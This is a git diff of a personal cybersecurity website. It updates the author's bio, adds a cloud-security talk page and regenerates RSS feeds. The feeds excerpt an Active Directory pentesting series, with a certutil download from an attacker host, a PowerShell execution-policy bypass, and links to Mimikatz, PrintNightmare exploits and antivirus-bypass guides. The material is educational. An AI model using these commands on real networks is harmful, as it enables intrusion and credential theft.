diff --git a/content/_index.md b/content/_index.md index ea4a23a..41d9e32 100644 --- a/content/_index.md +++ b/content/_index.md @@ -2,16 +2,19 @@ # 👋 Hello, World! ## I am Atharva Auti -I am a final-year college student pursuing my **Bachelor of Engineering (B.E.)** in Cyber Security degree at **Mumbai University**. I am an enthusiastic Programmer and a Networking geek with experience working as a **Cybersecurity Researcher and Developer**. +I am a passionate cybersecurity enthusiast currently pursuing a Master of Science in Cybersecurity Engineering at the [**University of Southern California**](mailto:auti@usc.edu). I hold a Bachelor of Engineering in Cybersecurity with Honors in AI & ML from Mumbai University. With a strong foundation in programming and networking, I have honed my skills through various research and development projects, including my tenure as a reverse engineer at VJTI’s Centre of Excellence in Complex Networks and Data Science, where I focused on ARM-based reverse engineering. -I recently co-founded **CyHEX Infotech Private Limited**, a startup dedicated to providing development, products, and services that make a difference in the field of cybersecurity. We are constantly learning and staying up-to-date with the latest trends and technologies to provide our clients with the best possible solutions. +In addition to my academic journey, I co-founded [**CyHEX Infotech Private Limited**](https://cyhex.co), a startup dedicated to advancing cybersecurity solutions through innovative development, products, and services. Our mission is to stay ahead of the curve by continuously learning and adapting to the latest trends and technologies, ensuring we provide our clients with cutting-edge solutions that make a real difference in the field of cybersecurity. -For business queries and collaborations, drop an email to [contact@cyhex.co](mailto:contact@cyhex.co) +My experience spans across different areas of cybersecurity, including threat intelligence, network security, and ethical hacking. I am committed to making a positive impact in the cybersecurity domain, leveraging my skills and experience to contribute to a safer digital world. + +For business queries and collaborations, drop an email to [auti@cyhex.co](mailto:auti@cyhex.co) #### Wanna send a message? [hi@auti.dev](mailto:hi@auti.dev) -[auti@cyhex.co](mailto:auti@cyhex.co) +[auti@cyhex.co](mailto:auti@cyhex.co) +[auti@usc.edu](mailto:auti@usc.edu) [PGP Key](../auti.pub) [Discord (auti.dev)](https://discordapp.com/channels/@me/631478564411146262/) diff --git a/content/talk/cloudsec-basics.md b/content/talk/cloudsec-basics.md new file mode 100644 index 0000000..8210714 --- /dev/null +++ b/content/talk/cloudsec-basics.md @@ -0,0 +1,20 @@ ++++ +title = "Cloud Security Basics" +date = "2024-06-15T12:00:00+05:30" + + description = "Cloud Security Basics" + +tags = ["cloud", "cybersecurity", "blue-teaming"] ++++ + +#### First seminar on 24th June 2024, as a seminar at Mumbai University + +[Presentation: docs.google.com](https://docs.google.com/presentation/d/1aYIKm7piiS-MUORRLOa0YzjamrX2eQZjI3YzL8b5gug/pub?start=false&loop=false) + + + +I had the honor of delivering a talk at SAKEC, **Mumbai University**, where I introduced the fundamental concepts of **cloud computing**. This session delved into the **core principles** of cloud architecture, service models, and deployment strategies, providing a comprehensive overview of how cloud technology is transforming the IT landscape. Through **practical examples** and **real-world scenarios**, I highlighted the **benefits of cloud adoption** and discussed the key considerations for securing cloud environments. This informative session aimed to equip the audience with the knowledge needed to navigate the evolving world of cloud computing and leverage its potential in their professional pursuits. + +### Credits + +I am sincerely grateful to [SAKEC Cybersecurity Department](https://www.sakec.ac.in/cyse/) for inviting me to speak during the Cloud Computing session. The encouragement and support were instrumental in allowing me to share key insights, contributing to a deeper understanding of cloud technology among the attendees. \ No newline at end of file diff --git a/public/blog/active-directory/index.xml b/public/blog/active-directory/index.xml index 82c145d..af0d980 100644 --- a/public/blog/active-directory/index.xml +++ b/public/blog/active-directory/index.xml @@ -1,85 +1,48 @@ - active-directory on auti.dev   ≽^._.^≼ ∫ + Active-Directory on auti.dev   ≽^._.^≼ ∫ https://auti.dev/blog/active-directory/ - Recent content in active-directory on auti.dev   ≽^._.^≼ ∫ - Hugo -- gohugo.io + Recent content in Active-Directory on auti.dev   ≽^._.^≼ ∫ + Hugo en-US Copyright © 2023, Atharva Auti. - Fri, 20 Aug 2021 12:35:53 +0530 + Fri, 20 Aug 2021 12:35:53 +0530 + Useful AD Resources https://auti.dev/useful-ad-resources/ Fri, 20 Aug 2021 12:35:53 +0530 - https://auti.dev/useful-ad-resources/ - Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases -Mitm6: https://github.com/fox-it/mitm6 -Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView -Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 -Mimikatz: https://github.com/gentilkiwi/mimikatz -PRET: https://github.com/RUB-NDS/PRET -Praeda: https://github.com/percx/Praeda -SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486) -LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899)) -cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675 -calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675 -Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa -Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/ -mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ -Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ -Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet -A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/ -Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html -GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/ + Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases Mitm6: https://github.com/fox-it/mitm6 Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 Mimikatz: https://github.com/gentilkiwi/mimikatz PRET: https://github.com/RUB-NDS/PRET Praeda: https://github.com/percx/Praeda SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486) LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899)) cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675 calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675 Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/ mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/ Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/ - Compromising AD - Part 4: Post Exploitation https://auti.dev/compromising-ad-part-4-post-exploitation/ Tue, 17 Aug 2021 12:35:53 +0530 - https://auti.dev/compromising-ad-part-4-post-exploitation/ - Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil -certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host -python -m SimpleHTTPServer [port] Browser -Navigate directly to the file (%20 for spaces) FTP -On Attacker Machine -python -m pyftpdlib 21 On Victim Machine, Browse to + Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host python -m SimpleHTTPServer [port] Browser Navigate directly to the file (%20 for spaces) FTP On Attacker Machine python -m pyftpdlib 21 On Victim Machine, Browse to - Compromising AD - Part 3: Post Compromise Attacks https://auti.dev/compromising-ad-part-3-post-compromise-attacks/ Mon, 16 Aug 2021 12:35:53 +0530 - https://auti.dev/compromising-ad-part-3-post-compromise-attacks/ Post-Compromise Attacks Post-Compromise Attacks passthehash ??? WTF Mitigations Token-Impersonation What are tokens? Two types Setup Mitigations Kerberoasting Kerberoast? Mitigations GPP-cPassword-Attacks Group Policy Preferences Attack aka MS14-025 Resources Setup Exploiting “Active” Machine on HacktheBox Privesc that Machine! Mitigations URL-File-Attacks SCF and URL file attack against writeable share Mitigations Print-Nightmare Resources Exploit Mitigation - just disable the damn service! Installation Exploit Mimikatz What’s that? Resources Exploit Golden-Ticket-Attack What is a Golden Ticket? Exploit Mitigations Zero-Logon aka CVE-2020-1472 Resources Exploit Mitigations Next >> Part 4: Post Exploitation passthehash If we crack a password and/or dump the SAM Hashes, we can leverage both for lateral movement in networks! - Compromising AD - Part 2: Post Compromise Enumeration https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/ Sun, 15 Aug 2021 12:37:53 +0530 - https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/ - Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView -Enumeration Load up a command prompt and cd into Downloads -powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView -. .\Powerview.ps1 Fundamental Commands -Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy). + Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView Enumeration Load up a command prompt and cd into Downloads powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView . .\Powerview.ps1 Fundamental Commands Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy). - Compromising AD - Part 1: Initial Attack Vectors https://auti.dev/compromising-ad-part-1-initial-attack-vectors/ Sun, 15 Aug 2021 12:35:53 +0530 - https://auti.dev/compromising-ad-part-1-initial-attack-vectors/ - Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure. -Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense. + Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure. Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense. - diff --git a/public/blog/blue-teaming/index.xml b/public/blog/blue-teaming/index.xml index 19933c9..1cf2984 100644 --- a/public/blog/blue-teaming/index.xml +++ b/public/blog/blue-teaming/index.xml @@ -1,31 +1,27 @@ - blue-teaming on auti.dev   ≽^._.^≼ ∫ + Blue-Teaming on auti.dev   ≽^._.^≼ ∫ https://auti.dev/blog/blue-teaming/ - Recent content in blue-teaming on auti.dev   ≽^._.^≼ ∫ - Hugo -- gohugo.io + Recent content in Blue-Teaming on auti.dev   ≽^._.^≼ ∫ + Hugo en-US Copyright © 2023, Atharva Auti. - Tue, 17 Oct 2023 12:35:53 +0530 + Tue, 17 Oct 2023 12:35:53 +0530 + Demystifying Elastic SIEM https://auti.dev/demystifying-elastic-siem/ Tue, 17 Oct 2023 12:35:53 +0530 - https://auti.dev/demystifying-elastic-siem/ Introduction Hey there! Following my recent presentation at the Elastic Community Event, I’m thrilled to extend the insights into setting up Elastic for cybersecurity tools. In this blog, we’ll take a hands-on approach, providing a detailed guide on leveraging Elasticsearch and its toolkit. Our focus? Building a robust Security Information and Event Management (SIEM) tool, seamlessly incorporating Suricata, Wazuh, Windows Sysmon, network packet capture, and Apache Webserver. All of this orchestrated within the dependable Proxmox stack and Debian server containers. - Leveraging Cybersecurity using ElasticSearch https://auti.dev/leveraging-cybersecurity-using-elasticsearch/ Tue, 17 Oct 2023 12:35:53 +0530 - https://auti.dev/leveraging-cybersecurity-using-elasticsearch/ - First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com -This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs. + First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs. - diff --git a/public/blog/cybersecurity/index.xml b/public/blog/cybersecurity/index.xml index 007584a..37a90ea 100644 --- a/public/blog/cybersecurity/index.xml +++ b/public/blog/cybersecurity/index.xml @@ -1,124 +1,76 @@ - cybersecurity on auti.dev   ≽^._.^≼ ∫ + Cybersecurity on auti.dev   ≽^._.^≼ ∫ https://auti.dev/blog/cybersecurity/ - Recent content in cybersecurity on auti.dev   ≽^._.^≼ ∫ - Hugo -- gohugo.io + Recent content in Cybersecurity on auti.dev   ≽^._.^≼ ∫ + Hugo en-US Copyright © 2023, Atharva Auti. - Tue, 17 Oct 2023 12:35:53 +0530 + Tue, 17 Oct 2023 12:35:53 +0530 + Demystifying Elastic SIEM https://auti.dev/demystifying-elastic-siem/ Tue, 17 Oct 2023 12:35:53 +0530 - https://auti.dev/demystifying-elastic-siem/ Introduction Hey there! Following my recent presentation at the Elastic Community Event, I’m thrilled to extend the insights into setting up Elastic for cybersecurity tools. In this blog, we’ll take a hands-on approach, providing a detailed guide on leveraging Elasticsearch and its toolkit. Our focus? Building a robust Security Information and Event Management (SIEM) tool, seamlessly incorporating Suricata, Wazuh, Windows Sysmon, network packet capture, and Apache Webserver. All of this orchestrated within the dependable Proxmox stack and Debian server containers. - Leveraging Cybersecurity using ElasticSearch https://auti.dev/leveraging-cybersecurity-using-elasticsearch/ Tue, 17 Oct 2023 12:35:53 +0530 - https://auti.dev/leveraging-cybersecurity-using-elasticsearch/ - First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com -This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs. + First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs. - HoneyTrack https://auti.dev/honeytrack/ Sat, 19 Aug 2023 14:28:54 +0530 - https://auti.dev/honeytrack/ - Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently. -HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network. + Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently. HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network. - OWASP Top 10 https://auti.dev/owasp-top-10/ Wed, 15 Feb 2023 12:22:44 +0530 - https://auti.dev/owasp-top-10/ - First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com -I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications. + First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications. - Useful AD Resources https://auti.dev/useful-ad-resources/ Fri, 20 Aug 2021 12:35:53 +0530 - https://auti.dev/useful-ad-resources/ - Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases -Mitm6: https://github.com/fox-it/mitm6 -Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView -Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 -Mimikatz: https://github.com/gentilkiwi/mimikatz -PRET: https://github.com/RUB-NDS/PRET -Praeda: https://github.com/percx/Praeda -SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486) -LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899)) -cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675 -calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675 -Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa -Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/ -mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ -Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ -Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet -A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/ -Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html -GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/ + Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases Mitm6: https://github.com/fox-it/mitm6 Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 Mimikatz: https://github.com/gentilkiwi/mimikatz PRET: https://github.com/RUB-NDS/PRET Praeda: https://github.com/percx/Praeda SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486) LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899)) cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675 calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675 Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/ mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/ Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/ - Compromising AD - Part 4: Post Exploitation https://auti.dev/compromising-ad-part-4-post-exploitation/ Tue, 17 Aug 2021 12:35:53 +0530 - https://auti.dev/compromising-ad-part-4-post-exploitation/ - Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil -certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host -python -m SimpleHTTPServer [port] Browser -Navigate directly to the file (%20 for spaces) FTP -On Attacker Machine -python -m pyftpdlib 21 On Victim Machine, Browse to + Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host python -m SimpleHTTPServer [port] Browser Navigate directly to the file (%20 for spaces) FTP On Attacker Machine python -m pyftpdlib 21 On Victim Machine, Browse to - Compromising AD - Part 3: Post Compromise Attacks https://auti.dev/compromising-ad-part-3-post-compromise-attacks/ Mon, 16 Aug 2021 12:35:53 +0530 - https://auti.dev/compromising-ad-part-3-post-compromise-attacks/ Post-Compromise Attacks Post-Compromise Attacks passthehash ??? WTF Mitigations Token-Impersonation What are tokens? Two types Setup Mitigations Kerberoasting Kerberoast? Mitigations GPP-cPassword-Attacks Group Policy Preferences Attack aka MS14-025 Resources Setup Exploiting “Active” Machine on HacktheBox Privesc that Machine! Mitigations URL-File-Attacks SCF and URL file attack against writeable share Mitigations Print-Nightmare Resources Exploit Mitigation - just disable the damn service! Installation Exploit Mimikatz What’s that? Resources Exploit Golden-Ticket-Attack What is a Golden Ticket? Exploit Mitigations Zero-Logon aka CVE-2020-1472 Resources Exploit Mitigations Next >> Part 4: Post Exploitation passthehash If we crack a password and/or dump the SAM Hashes, we can leverage both for lateral movement in networks! - Compromising AD - Part 2: Post Compromise Enumeration https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/ Sun, 15 Aug 2021 12:37:53 +0530 - https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/ - Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView -Enumeration Load up a command prompt and cd into Downloads -powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView -. .\Powerview.ps1 Fundamental Commands -Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy). + Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView Enumeration Load up a command prompt and cd into Downloads powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView . .\Powerview.ps1 Fundamental Commands Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy). - Compromising AD - Part 1: Initial Attack Vectors https://auti.dev/compromising-ad-part-1-initial-attack-vectors/ Sun, 15 Aug 2021 12:35:53 +0530 - https://auti.dev/compromising-ad-part-1-initial-attack-vectors/ - Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure. -Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense. + Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure. Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense. - diff --git a/public/blog/elasticsearch/index.xml b/public/blog/elasticsearch/index.xml index f2ad3fd..827f089 100644 --- a/public/blog/elasticsearch/index.xml +++ b/public/blog/elasticsearch/index.xml @@ -1,41 +1,34 @@ - elasticsearch on auti.dev   ≽^._.^≼ ∫ + Elasticsearch on auti.dev   ≽^._.^≼ ∫ https://auti.dev/blog/elasticsearch/ - Recent content in elasticsearch on auti.dev   ≽^._.^≼ ∫ - Hugo -- gohugo.io + Recent content in Elasticsearch on auti.dev   ≽^._.^≼ ∫ + Hugo en-US Copyright © 2023, Atharva Auti. - Tue, 17 Oct 2023 12:35:53 +0530 + Tue, 17 Oct 2023 12:35:53 +0530 + Demystifying Elastic SIEM https://auti.dev/demystifying-elastic-siem/ Tue, 17 Oct 2023 12:35:53 +0530 - https://auti.dev/demystifying-elastic-siem/ Introduction Hey there! Following my recent presentation at the Elastic Community Event, I’m thrilled to extend the insights into setting up Elastic for cybersecurity tools. In this blog, we’ll take a hands-on approach, providing a detailed guide on leveraging Elasticsearch and its toolkit. Our focus? Building a robust Security Information and Event Management (SIEM) tool, seamlessly incorporating Suricata, Wazuh, Windows Sysmon, network packet capture, and Apache Webserver. All of this orchestrated within the dependable Proxmox stack and Debian server containers. - Leveraging Cybersecurity using ElasticSearch https://auti.dev/leveraging-cybersecurity-using-elasticsearch/ Tue, 17 Oct 2023 12:35:53 +0530 - https://auti.dev/leveraging-cybersecurity-using-elasticsearch/ - First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com -This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs. + First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs. - HoneyTrack https://auti.dev/honeytrack/ Sat, 19 Aug 2023 14:28:54 +0530 - https://auti.dev/honeytrack/ - Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently. -HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network. + Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently. HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network. - diff --git a/public/blog/honeypot/index.xml b/public/blog/honeypot/index.xml index 59b43da..f08c51f 100644 --- a/public/blog/honeypot/index.xml +++ b/public/blog/honeypot/index.xml @@ -1,22 +1,20 @@ - honeypot on auti.dev   ≽^._.^≼ ∫ + Honeypot on auti.dev   ≽^._.^≼ ∫ https://auti.dev/blog/honeypot/ - Recent content in honeypot on auti.dev   ≽^._.^≼ ∫ - Hugo -- gohugo.io + Recent content in Honeypot on auti.dev   ≽^._.^≼ ∫ + Hugo en-US Copyright © 2023, Atharva Auti. - Sat, 19 Aug 2023 14:28:54 +0530 + Sat, 19 Aug 2023 14:28:54 +0530 + HoneyTrack https://auti.dev/honeytrack/ Sat, 19 Aug 2023 14:28:54 +0530 - https://auti.dev/honeytrack/ - Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently. -HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network. + Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently. HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network. - diff --git a/public/blog/index.xml b/public/blog/index.xml index 50a5198..52fe47a 100644 --- a/public/blog/index.xml +++ 